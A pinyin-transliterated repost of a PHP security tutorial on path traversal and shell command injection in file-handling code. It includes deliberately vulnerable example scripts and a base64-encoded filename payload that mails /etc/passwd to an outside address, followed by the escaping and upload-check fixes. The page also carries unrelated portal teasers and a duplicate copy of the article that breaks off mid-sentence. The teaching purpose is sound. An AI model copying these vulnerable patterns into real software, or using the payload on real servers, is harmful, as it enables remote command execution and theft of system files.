| 订阅 | 在线投稿
分享
 
 
当前位置: 王朝网络 >> php >> PHP an quan ji xiang guan

PHP an quan ji xiang guan

2008-12-22 08:10:36 编辑來源:互联网 评论
 
 
 
本文为【PHP 安全及相关】的拼音翻译版
  guan zhu an quan wen ti de chong yao xing
  kan dao de yuan fei quan bu
  zu zhi yong hu e yi po huai ni de cheng shi zui you xiao que jing chang bei hu lue de fang fa shi zai xie dai ma shi jiu kao lv ta de ke neng xing 。 liu yi dai ma zhong ke neng de an quan wen ti shi hen chong yao de 。 kao lv xia bian de zhi zai jian hua yong PHP zhong xie ru da liang wen ben wen jian de guo cheng de shi li han shu :
  <?php
  function write_text($filename, $text="") {
  static $open_files = array();
  // ru guo wen jian ming kong , guan bi quan bu wen jian
  if ($filename == NULL) {
  foreach($open_files as $fr) {
  fclose($fr);
  }
  return true;
  }
  $index = md5($filename);
  if(!isset($open_files[$index])) {
  $open_files[$index] = fopen($filename, "a+");
  if(!$open_files[$index]) return false;
  }
  fputs($open_files[$index], $text);
  return true;
  }
  ?>
  zhe ge han shu dai you liang ge que sheng shen shu , wen jian ming he yao xie ru wen jian de wen ben 。
  han shu jiang xian jian cha wen jian shi fou yi bei da kai ; ru guo shi , jiang shi yong yuan lai de wen jian ju bing 。 fou ze , jiang zi xing chuang jian 。 zai zhe liang zhong qing kuang zhong , wen ben dou hui bei xie ru wen jian 。
  ru guo chuan di gei han shu de wen jian ming shi NULL, na me suo you da kai de wen jian jiang bei guan bi 。 xia bian ti gong le yi ge shi yong shang de shi li 。
  ru guo kai fa zhe yi xia bian de ge shi lai xie ru duo ge wen ben wen jian , na me zhe ge han shu jiang qing chu he yi du de duo 。
  rang wo men jia ding zhe ge han shu cun zai yu yi ge dan du de wen jian zhong , zhe ge wen jian bao han le tiao yong zhe ge han shu de dai ma 。
  xia bian shi yi ge zhe yang de cheng shi , wo men jiao ta quotes.php:
  <html><body>
  <form action="<?=$_SERVER['PHP_SELF']?>" method="get">
  Choose the nature of the quote:
  <select name="quote" size="3">
  <option value="funny">Humorous quotes</option>
  <option value="political">Political quotes</option>
  <option value="love">Romantic Quotes</option>
  </select><br />
  The quote: <input type="text" name="quote_text" size="30" />
  <input type="submit" value="Save Quote" />
  </form>
  </body></html>
  <?php
  include_once('write_text.php');
  $filename = "/home/web/quotes/{$_GET['quote']}";
  $quote_msg = $_GET['quote_text'];
  if (write_text($filename, $quote_msg)) {
  echo "<center><hr><h2>Quote saved!</h2></center>";
  } else {
  echo "<center><hr><h2>Error writing quote</h2></center>";
  }
  write_text(NULL);
  ?>
  ru tong ni kan dao de , zhe wei kai fa zhe shi yong le write_text() han shu lai chuang jian yi ge ti xi shi de yong hu ke yi ti jiao ta men xi huan de ge yan , zhe xie ge yan jiang bei cun fang zai yi ge wen ben wen jian zhong 。
  bu xing de shi , kai fa zhe ke neng mei you xiang dao , zhe ge cheng shi ye yuan xu le e yi yong hu wei hai web server de an quan 。
  ye xu xian zai ni zheng nao zhe tou xiang zhe jiu jing zhe ge kan qi lai hen wu gu de cheng shi zen yang yin ru le an quan feng xian 。
  ru guo ni kan bu chu lai , kao lv xia bian zhe ge URL, ji zhu zhe ge cheng shi jiao zuo quotes.php:
http://www.somewhere.com/fun/quotes.php?quote=different_file.dat&quote_text=garbage+data
  dang zhe ge URL chuan di gei web server shi jiang hui fa sheng shen me ?
  xian ran ,quotes.php jiang bei zhi xing , dan shi , bu shi jiang yi ju ge yan xie ru dao wo men xi wang de san ge wen jian zhong zhi yi , xiang fan de , yi ge jiao zuo different_file.dat de xin wen jian jiang bei jian li , qi zhong bao han yi ge zi fu chuan garbage data。
  xian ran , zhe bu shi wo men xi wang de xing wei , e yi yong hu ke neng tong guo ba quote zhi ding wei ../../../etc/passwd lai fang wen UNIX mi ma wen jian cong er chuang jian yi ge zhang hao ( jin guan zhe xu yao web server yi superuser yun xing cheng shi , ru guo shi zhe yang de , ni ying gai ting zhi yue du , ma shang qu xiu fu ta )。
  ru guo /home/web/quotes/ ke yi tong guo liu lan qi fang wen , ke neng zhe ge cheng shi zui yan chong de an quan wen ti shi ta yuan xu ren he yong hu xie ru he yun xing ren yi PHP cheng shi 。 zhe jiang dai lai wu qiong de ma fan 。
  zhe li you yi xie jie jue fang an 。 ru guo ni zhi xu yao xie ru mu lu xia de yi xie wen jian , ke yi kao lv shi yong yi ge xiang guan de shu zu lai cun fang wen jian ming 。 ru guo yong hu shu ru de wen jian cun zai yu zhe ge shu zu zhong , jiu ke yi an quan de xie ru 。 ling yi ge xiang fa shi qu diao suo you de bu shi shu zi he zi mu de zi fu lai que bao mei you mu lu fen ge fu hao 。 huan you yi ge ban fa shi jian cha wen jian de kuo zhan ming lai bao zheng wen jian bu hui bei web server zhi xing 。
  yuan ze hen jian dan , zuo wei yi ge kai fa zhe ni bi xu bi cheng shi zai ni xi wang de qing kuang xia yun xing shi kao lv geng duo 。
  ru guo fei fa shu ju jin ru dao yi ge form yuan su zhong hui fa sheng shen me ? e yi yong hu shi fou neng shi ni de cheng shi yi bu xi wang de fang shi yun xing ? shen me fang fa neng zu zhi zhe xie gong ji ? ni de web server he PHP cheng shi zhi you zai zui ruo de an quan lian jie xia cai an quan , suo yi que ren zhe xie ke neng bu an quan de lian jie shi fou an quan hen chong yao 。
  chang jian de she ji an quan de cuo wu
  zhe li gei chu yi xie yao dian , yi ge ke neng wei ji an quan de bian ma shang de he guan li shang de shi wu de jian yao bu wan zheng lie biao
  cuo wu 1。 xin lai shu ju
  zhe shi guan chuan yu wo guan yu PHP cheng shi an quan de tao lun de zhu ti , ni jue bu neng xiang xin yi ge lai zi wai bu de shu ju 。 bu guan ta lai zi yong hu ti jiao biao dan , wen jian xi tong de wen jian huo zhe huan jing bian liang , ren he shu ju dou bu neng jian dan de xiang dang ran de cai yong 。 suo yi yong hu shu ru bi xu jin xing yan zheng bing jiang zhi ge shi hua yi bao zheng an quan 。
  cuo wu 2。 zai web mu lu zhong cun chu min gan shu ju
  ren he he suo you de min gan shu ju dou ying gai cun fang zai du li yu xu yao shi yong shu ju de cheng shi de wen jian zhong , bing bao cun zai yi ge bu neng tong guo liu lan qi fang wen de mu lu xia 。 dang xu yao shi yong min gan shu ju shi , zai tong guo include huo require yu ju lai bao han dao shi dang de PHP cheng shi zhong 。
  cuo wu 3。 bu shi yong tui jian de an quan fang fan cuo shi
  PHP shou ce bao han le zai shi yong he bian xie PHP cheng shi shi guan yu an quan fang fan de wan zheng zhang jie 。 shou ce ye ( ji hu ) ji yu an li qing chu de shuo ming le shen me shi hou cun zai qian zai an quan feng xian he zen me jiang feng xian jiang di dao zui di 。 you ru , e yi yong hu yi kao kai fa zhe he guan li yuan de shi wu de dao guan xin de an quan xin xi yi huo qu xi tong de quan xian 。 liu yi zhe xie jing gao bing shi dang de cai qu cuo shi lai jian xiao e yi yong hu gei ni de xi tong dai lai zhen zheng de po huai de ke neng xing 。
  zai PHP zhong zhi xing xi tong tiao yong
  zai PHP zhong you hen duo fang fa ke yi zhi xing xi tong tiao yong 。
  bi ru ,system(), exec(), passthru(), popen() he fan dan yin hao (`) cao zuo fu dou yuan xu ni zai cheng shi zhong zhi xing xi tong tiao yong 。 ru guo bu shi dang de shi yong shang bian zhe xie han shu jiang hui wei e yi yong hu zai ni de fu wu qi shang zhi xing xi tong ming ling da kai da men 。 xiang zai fang wen wen jian shi , jue da duo shu qing kuang xia , an quan lou dong fa sheng zai you yu bu ke kao de wai bu shu ru dao zhi de xi tong ming ling zhi xing 。
  shi yong xi tong tiao yong de yi ge li zi cheng shi
  kao lv yi ge chu li http wen jian shang chuan de cheng shi , ta shi yong zip cheng xu lai ya suo wen jian , ran hou ba ta yi dong dao zhi ding de mu lu ( mo ren wei /usr/local/archives/)。 dai ma ru xia :
  <?php
  $zip = "/usr/bin/zip";
  $store_path = "/usr/local/archives/";
  if (isset($_FILES['file'])) {
  $tmp_name = $_FILES['file']['tmp_name'];
  $cmp_name = dirname($_FILES['file']['tmp_name']) .
  "/{$_FILES['file']['name']}.zip";
  $filename = basename($cmp_name);
  if (file_exists($tmp_name)) {
  $systemcall = "$zip $cmp_name $tmp_name";
  $output = `$systemcall`;
  if (file_exists($cmp_name)) {
  $savepath = $store_path.$filename;
  rename($cmp_name, $savepath);
  }
  }
  }
  ?>
  <form enctype="multipart/form-data" action="<?
  php echo $_SERVER['PHP_SELF'];
  ?>" method="POST">
  <input type="HIDDEN" name="MAX_FILE_SIZE" value="1048576">
  File to compress: <input name="file" type="file"><br />
  <input type="submit" value="Compress File">
  </form>
  sui ran zhe duan cheng shi kan qi lai xiang dang jian dan yi dong , dan shi e yi yong hu que ke yi tong guo yi xie fang fa lai li yong ta 。 zui yan chong de an quan wen ti cun zai yu wo men zhi xing le ya suo ming ling ( tong guo ` cao zuo fu ), zai xia bian de xing zhong ke yi qing chu de kan dao zhe dian :
  if (isset($_FILES['file'])) {
  $tmp_name = $_FILES['file']['tmp_name'];
  $cmp_name = dirname($_FILES['file']['tmp_name']) .
  "/{$_FILES['file']['name']}.zip";
  $filename = basename($cmp_name);
  if (file_exists($tmp_name)) {
  $systemcall = "$zip $cmp_name $tmp_name";
  $output = `$systemcall`;
  ...
  qi pian cheng shi zhi xing ren yi shell ming ling
  sui ran zhe duan dai ma kan qi lai xiang dang an quan , ta que you shi ren he you wen jian shang chuan quan xian de yong hu zhi xing ren yi shell ming ling de qian zai wei xian !
  zhun que de shuo , zhe ge an quan lou dong lai zi dui $cmp_name bian liang de fu zhi 。 zai zhe li , wo men xi wang ya suo hou de wen jian shi yong cong ke hu ji shang chuan shi de wen jian ming ( dai you .zip kuo zhan ming )。 wo men yong dao le $_FILES['file']['name']( ta bao han le shang chuan wen jian zai ke hu ji shi de wen jian ming )。
  zai zhe yang de qing kuang xia , e yi yong hu wan quan ke yi tong guo shang chuan yi ge han dui di ceng cao zuo xi tong you te shu yi yi zi fu de wen jian lai da dao zi ji de mu de 。 ju ge li zi , ru guo yong hu an zhao xia bian de xing shi chuang jian yi ge kong wen jian hui zen me yang ?(UNIX shell ti shi fu xia )
  [user@localhost]# touch ";php -r '$code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);';"
  zhe ge ming ling jiang chuang jian yi ge ming zi ru xia de wen jian :
  ;php -r '$code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);';
  kan qi lai hen qi guai ? rang wo men lai kan kan zhe ge “ wen jian ming ”, wo men fa xian ta hen xiang shi CLI ban ben de PHP zhi xing ru xia dai ma de ming ling :
  <?php
  $code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);
  ?>
  ru guo ni chu yu hao qi er xian shi $code bian liang de nei rong , jiu hui fa xian ta bao han le mailbaduser@somewhere.com< /etc/passwd。 ru guo yong hu ba zhe ge wen jian chuan gei cheng shi , jie zhe PHP zhi xing xi tong tiao yong lai ya suo wen jian ,PHP shi ji shang jiang zhi xing ru xia yu ju :
  /usr/bin/zip /tmp/;php -r
  '$code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);';.zip /tmp/phpY4iatI
  rang ren chi jing de , shang bian de ming ling bu shi yi ge yu ju er shi 3 ge ! you yu UNIX shell ba fen hao (;) jie shi wei yi ge shell ming ling de jie shu he ling yi ming ling de kai shi , chu le fen hao zai zai yin hao zhong shi ,PHP de system() shi ji shang jiang ru xia zhi xing :
  [user@localhost]# /usr/bin/zip /tmp/
  [user@localhost]# php -r
  '$code=base64_decode(
  "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA==");
  system($code);'
  [user@localhost]# .zip /tmp/phpY4iatI
  ru ni suo jian , zhe ge kan qi lai wu hai de PHP cheng shi tu ran bian cheng zhi xing ren yi shell ming ling he qi ta PHP cheng shi de hou men 。 sui ran zhe ge li zi zhi hui zai lu jing xia you CLI ban ben de PHP de xi tong shang you xiao , dan shi yong zhe zhong ji shu ke yi tong guo qi ta de fang fa lai da dao tong yang de xiao guo 。
  dui kang xi tong tiao yong gong ji
  zhe li de guan jian reng ran shi , lai zi yong hu de shu ru , bu guan nei rong ru he , dou bu ying gai xiang xin ! wen ti reng ran shi ru he zai shi yong xi tong tiao yong shi ( chu le gen ben bu shi yong ta men ) bi mian lei si de qing kuang chu xian 。 wei le dui kang zhe zhong lei xing de gong ji ,PHP ti gong le liang ge han shu ,escapeshellarg() he escapeshellcmd()。
  escapeshellarg() han shu shi wei le cong yong zuo xi tong ming ling de shen shu de yong hu shu ru ( zai wo men de li zi zhong , shi zip ming ling ) zhong yi chu han you qian zai wei xian de zi fu er she ji de 。 zhe ge han shu de yu fa ru xia :
  escapeshellarg($string)
  $string suo zai chu shi yong yu guo lv de shu ru , fan hui zhi shi guo lv hou de zi fu 。 zhi xing shi , zhe ge han shu jiang zai zi fu liang bian tian jia dan yin hao , bing zhuan yi yuan lai zi fu chuan zhong de dan yin hao ( zai qi qian bian jia shang )。 zai wo men de li cheng zhong , ru guo wo men zai zhi xing xi tong ming ling zhi qian jia shang zhe xie xing :
  $cmp_name = escapeshellarg($cmp_name);
  $tmp_name = escapeshellarg($tmp_name);
  wo men jiu neng tong guo que bao chuan di gei xi tong tiao yong de shen shu yi jing chu li , shi yi ge mei you qi ta yi tu de yong hu shu ru , yi gui bi zhe yang de an quan feng xian 。
  escapeshellcmd() he escapeshellarg() lei si , zhi shi ta zhi zhuan yi dui di ceng cao zuo xi tong you te shu yi yi de zi fu 。 he escapeshellarg() bu tong ,escapeshellcmd() bu hui chu li nei rong zhong de kong bai ge 。 ju ge shi li , dang shi yong escapeshellcmd() zhuan yi shi , zi fu
  $string = "'hello, world!';evilcommand"
  jiang bian wei :
  'hello, world';evilcommand
  ru guo zhe ge zi fu chuan yong zuo xi tong tiao yong de shen shu ta jiang reng ran bu neng de dao zheng que de jie guo , yin wei shell jiang hui ba ta fen bie jie shi wei liang ge fen li de shen shu : 'hello he world';evilcommand。 ru guo yong hu shu ru yong yu xi tong tiao yong de shen shu lie biao bu fen ,escapeshellarg() shi yi ge geng hao de xuan ze 。
  bao hu shang chuan de wen jian
  zai zheng pian wen zhang zhong , wo yi zhi zhi zhe chong jiang xi tong tiao yong ru he bei e yi yong hu jie chi yi chan sheng wo men bu xi wang jie guo 。
  dan shi , zhe li huan you ling wai yi ge qian zai de an quan feng xian zhi de ti dao 。 zai kan dao wo men de li cheng , ba ni de zhu yi li ji zhong zai xia bian de xing shang :
  $tmp_name = $_FILES['file']['tmp_name'];
  $cmp_name = dirname($_FILES['file']['tmp_name']) .
  "/{$_FILES['file']['name']}.zip";
  $filename = basename($cmp_name);
  if (file_exists($tmp_name)) {
  shang bian pian duan zhong de dai ma xing dao zhi de yi ge qian zai an quan feng xian shi , zui hou yi xing wo men pan duan shang chuan de wen jian shi fou shi ji cun zai ( yi lin shi wen jian ming $tmp_name cun zai )。
  zhe ge an quan feng xian bing bu lai zi yu PHP zi shen , er zai yu bao cun zai $tmp_name zhong de wen jian ming shi ji shang gen ben bu shi yi ge wen jian , er shi zhi xiang e yi yong hu xi wang fang wen de wen jian , bi ru ,/etc/passwd。
  wei le fang zhi zhe yang de qing kuang fa sheng ,PHP ti gong le is_uploaded_file() han shu , ta he file_exists() yi yang , dan shi ta huan ti gong wen jian shi fou zhen de cong ke hu ji shang shang chuan de jian cha 。
  zai jue da duo shu qing kuang xia , ni jiang xu yao yi dong shang chuan de wen jian ,PHP ti gong le move_uploaded_file() han shu , lai pei he is_uploaded_file()。 zhe ge han shu he rename() yi yang yong yu yi dong wen jian , zhi shi ta hui zai zhi xing qian zi dong jian cha yi que bao bei yi dong de wen jian shi shang chuan de wen jian 。move_uploaded_file() de yu fa ru xia :
  move_uploaded_file($filename, $destination);
  zai zhi xing shi , han shu jiang yi dong shang chuan wen jian $filename dao mu de di $destination bing fan hui yi ge bu er zhi lai biao zhi cao zuo shi fou cheng gong 。
  zhu : John Coggeshall shi yi wei PHP gu wen he zuo zhe 。 cong ta kai shi wei PHP bu mian yi jing 5 nian zuo you le 。
  ying wen yuan wen :http://www.onlamp.com/pub/a/php/2003/08/28/php_foundations.html原文】【汉音对照
 
 
 
 
 
 
 
 
 
日版宠物情人插曲《Winding Road》歌词

日版宠物情人2017的插曲,很带节奏感,日语的,女生唱的。 最后听见是在第8集的时候女主手割伤了,然后男主用嘴帮她吸了一下,插曲就出来了。 歌手:Def...

兄弟共妻,我成了他们夜里的美食

老钟家的两个儿子很特别,就是跟其他的人不太一样,魔一般的执着。兄弟俩都到了要结婚的年龄了,不管自家老爹怎么磨破嘴皮子,兄弟俩说不娶就不娶,老父母为兄弟两操碎了心...

如何磨出破洞牛仔裤?牛仔裤怎么剪破洞?

把牛仔裤磨出有线的破洞 1、具体工具就是磨脚石,下面垫一个硬物,然后用磨脚石一直磨一直磨,到把那块磨薄了,用手撕开就好了。出来的洞啊很自然的。需要猫须的话调几...

我就是扫描下图得到了敬业福和爱国福

先来看下敬业福和爱国福 今年春节,支付宝再次推出了“五福红包”活动,表示要“把欠大家的敬业福都还给大家”。 今天该活动正式启动,和去年一样,需要收集“五福”...

冰箱异味产生的原因和臭味去除的方法

有时候我们打开冰箱就会闻到一股异味,冰箱里的这种异味是因为一些物质发出的气味的混合体,闻起来让人恶心。 产生这些异味的主要原因有以下几点。 1、很多人有这种习...

 
 
guan zhu an quan wen ti de chong yao xing kan dao de yuan fei quan bu zu zhi yong hu e yi po huai ni de cheng shi zui you xiao que jing chang bei hu lue de fang fa shi zai xie dai ma shi jiu kao lv ta de ke neng xing 。 liu yi dai ma zhong ke neng de an quan wen ti shi hen chong yao de 。 kao lv xia bian de zhi zai jian hua yong PHP zhong xie ru da liang wen ben wen jian de guo cheng de shi li han shu : <?php function write_text($filename, $text="") { static $open_files = array(); // ru guo wen jian ming kong , guan bi quan bu wen jian if ($filename == NULL) { foreach($open_files as $fr) { fclose($fr); } return true; } $index = md5($filename); if(!isset($open_files[$index])) { $open_files[$index] = fopen($filename, "a+"); if(!$open_files[$index]) return false; } fputs($open_files[$index], $text); return true; } ?> zhe ge han shu dai you liang ge que sheng shen shu , wen jian ming he yao xie ru wen jian de wen ben 。 han shu jiang xian jian cha wen jian shi fou yi bei da kai ; ru guo shi , jiang shi yong yuan lai de wen jian ju bing 。 fou ze , jiang zi xing chuang jian 。 zai zhe liang zhong qing kuang zhong , wen ben dou hui bei xie ru wen jian 。 ru guo chuan di gei han shu de wen jian ming shi NULL, na me suo you da kai de wen jian jiang bei guan bi 。 xia bian ti gong le yi ge shi yong shang de shi li 。 ru guo kai fa zhe yi xia bian de ge shi lai xie ru duo ge wen ben wen jian , na me zhe ge han shu jiang qing chu he yi du de duo 。 rang wo men jia ding zhe ge han shu cun zai yu yi ge dan du de wen jian zhong , zhe ge wen jian bao han le tiao yong zhe ge han shu de dai ma 。 xia bian shi yi ge zhe yang de cheng shi , wo men jiao ta quotes.php: <html><body> <form action="<?=$_SERVER['PHP_SELF']?>" method="get"> Choose the nature of the quote: <select name="quote" size="3"> <option value="funny">Humorous quotes</option> <option value="political">Political quotes</option> <option value="love">Romantic Quotes</option> </select><br /> The quote: <input type="text" name="quote_text" size="30" /> <input type="submit" value="Save Quote" /> </form> </body></html> <?php include_once('write_text.php'); $filename = "/home/web/quotes/{$_GET['quote']}"; $quote_msg = $_GET['quote_text']; if (write_text($filename, $quote_msg)) { echo "<center><hr><h2>Quote saved!</h2></center>"; } else { echo "<center><hr><h2>Error writing quote</h2></center>"; } write_text(NULL); ?> ru tong ni kan dao de , zhe wei kai fa zhe shi yong le write_text() han shu lai chuang jian yi ge ti xi shi de yong hu ke yi ti jiao ta men xi huan de ge yan , zhe xie ge yan jiang bei cun fang zai yi ge wen ben wen jian zhong 。 bu xing de shi , kai fa zhe ke neng mei you xiang dao , zhe ge cheng shi ye yuan xu le e yi yong hu wei hai web server de an quan 。 ye xu xian zai ni zheng nao zhe tou xiang zhe jiu jing zhe ge kan qi lai hen wu gu de cheng shi zen yang yin ru le an quan feng xian 。 ru guo ni kan bu chu lai , kao lv xia bian zhe ge URL, ji zhu zhe ge cheng shi jiao zuo quotes.php: [url=http://www.somewhere.com/fun/quotes.php?quote=different_file.dat&quote_text=garbage+data]http://www.somewhere.com/fun/quotes.php?quote=different_file.dat&quote_text=garbage+data[/url] dang zhe ge URL chuan di gei web server shi jiang hui fa sheng shen me ? xian ran ,quotes.php jiang bei zhi xing , dan shi , bu shi jiang yi ju ge yan xie ru dao wo men xi wang de san ge wen jian zhong zhi yi , xiang fan de , yi ge jiao zuo different_file.dat de xin wen jian jiang bei jian li , qi zhong bao han yi ge zi fu chuan garbage data。 xian ran , zhe bu shi wo men xi wang de xing wei , e yi yong hu ke neng tong guo ba quote zhi ding wei ../../../etc/passwd lai fang wen UNIX mi ma wen jian cong er chuang jian yi ge zhang hao ( jin guan zhe xu yao web server yi superuser yun xing cheng shi , ru guo shi zhe yang de , ni ying gai ting zhi yue du , ma shang qu xiu fu ta )。 ru guo /home/web/quotes/ ke yi tong guo liu lan qi fang wen , ke neng zhe ge cheng shi zui yan chong de an quan wen ti shi ta yuan xu ren he yong hu xie ru he yun xing ren yi PHP cheng shi 。 zhe jiang dai lai wu qiong de ma fan 。 zhe li you yi xie jie jue fang an 。 ru guo ni zhi xu yao xie ru mu lu xia de yi xie wen jian , ke yi kao lv shi yong yi ge xiang guan de shu zu lai cun fang wen jian ming 。 ru guo yong hu shu ru de wen jian cun zai yu zhe ge shu zu zhong , jiu ke yi an quan de xie ru 。 ling yi ge xiang fa shi qu diao suo you de bu shi shu zi he zi mu de zi fu lai que bao mei you mu lu fen ge fu hao 。 huan you yi ge ban fa shi jian cha wen jian de kuo zhan ming lai bao zheng wen jian bu hui bei web server zhi xing 。 yuan ze hen jian dan , zuo wei yi ge kai fa zhe ni bi xu bi cheng shi zai ni xi wang de qing kuang xia yun xing shi kao lv geng duo 。 ru guo fei fa shu ju jin ru dao yi ge form yuan su zhong hui fa sheng shen me ? e yi yong hu shi fou neng shi ni de cheng shi yi bu xi wang de fang shi yun xing ? shen me fang fa neng zu zhi zhe xie gong ji ? ni de web server he PHP cheng shi zhi you zai zui ruo de an quan lian jie xia cai an quan , suo yi que ren zhe xie ke neng bu an quan de lian jie shi fou an quan hen chong yao 。 chang jian de she ji an quan de cuo wu zhe li gei chu yi xie yao dian , yi ge ke neng wei ji an quan de bian ma shang de he guan li shang de shi wu de jian yao bu wan zheng lie biao cuo wu 1。 xin lai shu ju zhe shi guan chuan yu wo guan yu PHP cheng shi an quan de tao lun de zhu ti , ni jue bu neng xiang xin yi ge lai zi wai bu de shu ju 。 bu guan ta lai zi yong hu ti jiao biao dan , wen jian xi tong de wen jian huo zhe huan jing bian liang , ren he shu ju dou bu neng jian dan de xiang dang ran de cai yong 。 suo yi yong hu shu ru bi xu jin xing yan zheng bing jiang zhi ge shi hua yi bao zheng an quan 。 cuo wu 2。 zai web mu lu zhong cun chu min gan shu ju ren he he suo you de min gan shu ju dou ying gai cun fang zai du li yu xu yao shi yong shu ju de cheng shi de wen jian zhong , bing bao cun zai yi ge bu neng tong guo liu lan qi fang wen de mu lu xia 。 dang xu yao shi yong min gan shu ju shi , zai tong guo include huo require yu ju lai bao han dao shi dang de PHP cheng shi zhong 。 cuo wu 3。 bu shi yong tui jian de an quan fang fan cuo shi PHP shou ce bao han le zai shi yong he bian xie PHP cheng shi shi guan yu an quan fang fan de wan zheng zhang jie 。 shou ce ye ( ji hu ) ji yu an li qing chu de shuo ming le shen me shi hou cun zai qian zai an quan feng xian he zen me jiang feng xian jiang di dao zui di 。 you ru , e yi yong hu yi kao kai fa zhe he guan li yuan de shi wu de dao guan xin de an quan xin xi yi huo qu xi tong de quan xian 。 liu yi zhe xie jing gao bing shi dang de cai qu cuo shi lai jian xiao e yi yong hu gei ni de xi tong dai lai zhen zheng de po huai de ke neng xing 。 zai PHP zhong zhi xing xi tong tiao yong zai PHP zhong you hen duo fang fa ke yi zhi xing xi tong tiao yong 。 bi ru ,system(), exec(), passthru(), popen() he fan dan yin hao (`) cao zuo fu dou yuan xu ni zai cheng shi zhong zhi xing xi tong tiao yong 。 ru guo bu shi dang de shi yong shang bian zhe xie han shu jiang hui wei e yi yong hu zai ni de fu wu qi shang zhi xing xi tong ming ling da kai da men 。 xiang zai fang wen wen jian shi , jue da duo shu qing kuang xia , an quan lou dong fa sheng zai you yu bu ke kao de wai bu shu ru dao zhi de xi tong ming ling zhi xing 。 shi yong xi tong tiao yong de yi ge li zi cheng shi kao lv yi ge chu li http wen jian shang chuan de cheng shi , ta shi yong zip cheng xu lai ya suo wen jian , ran hou ba ta yi dong dao zhi ding de mu lu ( mo ren wei /usr/local/archives/)。 dai ma ru xia : <?php $zip = "/usr/bin/zip"; $store_path = "/usr/local/archives/"; if (isset($_FILES['file'])) { $tmp_name = $_FILES['file']['tmp_name']; $cmp_name = dirname($_FILES['file']['tmp_name']) . "/{$_FILES['file']['name']}.zip"; $filename = basename($cmp_name); if (file_exists($tmp_name)) { $systemcall = "$zip $cmp_name $tmp_name"; $output = `$systemcall`; if (file_exists($cmp_name)) { $savepath = $store_path.$filename; rename($cmp_name, $savepath); } } } ?> <form enctype="multipart/form-data" action="<? php echo $_SERVER['PHP_SELF']; ?>" method="POST"> <input type="HIDDEN" name="MAX_FILE_SIZE" value="1048576"> File to compress: <input name="file" type="file"><br /> <input type="submit" value="Compress File"> </form> sui ran zhe duan cheng shi kan qi lai xiang dang jian dan yi dong , dan shi e yi yong hu que ke yi tong guo yi xie fang fa lai li yong ta 。 zui yan chong de an quan wen ti cun zai yu wo men zhi xing le ya suo ming ling ( tong guo ` cao zuo fu ), zai xia bian de xing zhong ke yi qing chu de kan dao zhe dian : if (isset($_FILES['file'])) { $tmp_name = $_FILES['file']['tmp_name']; $cmp_name = dirname($_FILES['file']['tmp_name']) . "/{$_FILES['file']['name']}.zip"; $filename = basename($cmp_name); if (file_exists($tmp_name)) { $systemcall = "$zip $cmp_name $tmp_name"; $output = `$systemcall`; ... qi pian cheng shi zhi xing ren yi shell ming ling sui ran zhe duan dai ma kan qi lai xiang dang an quan , ta que you shi ren he you wen jian shang chuan quan xian de yong hu zhi xing ren yi shell ming ling de qian zai wei xian ! zhun que de shuo , zhe ge an quan lou dong lai zi dui $cmp_name bian liang de fu zhi 。 zai zhe li , wo men xi wang ya suo hou de wen jian shi yong cong ke hu ji shang chuan shi de wen jian ming ( dai you .zip kuo zhan ming )。 wo men yong dao le $_FILES['file']['name']( ta bao han le shang chuan wen jian zai ke hu ji shi de wen jian ming )。 zai zhe yang de qing kuang xia , e yi yong hu wan quan ke yi tong guo shang chuan yi ge han dui di ceng cao zuo xi tong you te shu yi yi zi fu de wen jian lai da dao zi ji de mu de 。 ju ge li zi , ru guo yong hu an zhao xia bian de xing shi chuang jian yi ge kong wen jian hui zen me yang ?(UNIX shell ti shi fu xia ) [user@localhost]# touch ";php -r '$code=base64_decode( "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA=="); system($code);';" zhe ge ming ling jiang chuang jian yi ge ming zi ru xia de wen jian : ;php -r '$code=base64_decode( "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA=="); system($code);'; kan qi lai hen qi guai ? rang wo men lai kan kan zhe ge “ wen jian ming ”, wo men fa xian ta hen xiang shi CLI ban ben de PHP zhi xing ru xia dai ma de ming ling : <?php $code=base64_decode( "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA=="); system($code); ?> ru guo ni chu yu hao qi er xian shi $code bian liang de nei rong , jiu hui fa xian ta bao han le [url=mailto:mailbaduser@somewhere.com]mailbaduser@somewhere.com[/url]< /etc/passwd。 ru guo yong hu ba zhe ge wen jian chuan gei cheng shi , jie zhe PHP zhi xing xi tong tiao yong lai ya suo wen jian ,PHP shi ji shang jiang zhi xing ru xia yu ju : /usr/bin/zip /tmp/;php -r '$code=base64_decode( "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA=="); system($code);';.zip /tmp/phpY4iatI rang ren chi jing de , shang bian de ming ling bu shi yi ge yu ju er shi 3 ge ! you yu UNIX shell ba fen hao (;) jie shi wei yi ge shell ming ling de jie shu he ling yi ming ling de kai shi , chu le fen hao zai zai yin hao zhong shi ,PHP de system() shi ji shang jiang ru xia zhi xing : [user@localhost]# /usr/bin/zip /tmp/ [user@localhost]# php -r '$code=base64_decode( "bWFpbCBiYWR1c2VyQHNvbWV3aGVyZS5jb20gPCAvZXRjL3Bhc3N3ZA=="); system($code);' [user@localhost]# .zip /tmp/phpY4iatI ru ni suo jian , zhe ge kan qi lai wu hai de PHP cheng shi tu ran bian cheng zhi xing ren yi shell ming ling he qi ta PHP cheng shi de hou men 。 sui ran zhe ge li zi zhi hui zai lu jing xia you CLI ban ben de PHP de xi tong shang you xiao , dan shi yong zhe zhong ji shu ke yi tong guo qi ta de fang fa lai da dao tong yang de xiao guo 。 dui kang xi tong tiao yong gong ji zhe li de guan jian reng ran shi , lai zi yong hu de shu ru , bu guan nei rong ru he , dou bu ying gai xiang xin ! wen ti reng ran shi ru he zai shi yong xi tong tiao yong shi ( chu le gen ben bu shi yong ta men ) bi mian lei si de qing kuang chu xian 。 wei le dui kang zhe zhong lei xing de 